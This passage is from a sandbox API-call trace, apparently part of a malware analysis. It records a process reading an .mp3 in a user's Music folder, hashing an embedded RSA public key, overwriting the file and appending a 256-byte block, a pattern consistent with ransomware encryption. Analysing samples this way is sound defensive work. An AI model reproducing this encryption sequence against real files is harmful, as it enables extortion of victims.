Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.326] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\mOm18edC.mp3") returned=".mp3" [0195.326] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\mOm18edC.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\mom18edc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.327] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=97530) returned 1 [0195.327] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.330] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17cd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.330] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.332] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.332] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x17cfa, lpOverlapped=0x0) returned 1 [0195.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.333] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.333] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.334] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.334] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.334] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.334] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.334] GetLastError () returned 0x0 [0195.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.334] GetLastError () returned 0x0 [0195.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.335] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.335] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.335] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.335] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.335] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17d00) returned 0x2af5168 [0195.336] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2260 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2218 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.337] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6440 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6428 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.340] GetCurrentThreadId () returned 0x5d8 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8268 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.341] GetCurrentThreadId () returned 0x5d8 [0195.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6440 [0195.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64a0 [0195.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64b8 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6458 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6428 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2218 | out: hHeap=0x2c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.351] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x17cf5, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x17cf5, lpOverlapped=0x0) returned 1 [0195.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.353] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17cfa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.353] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.354] HeapFree (in: 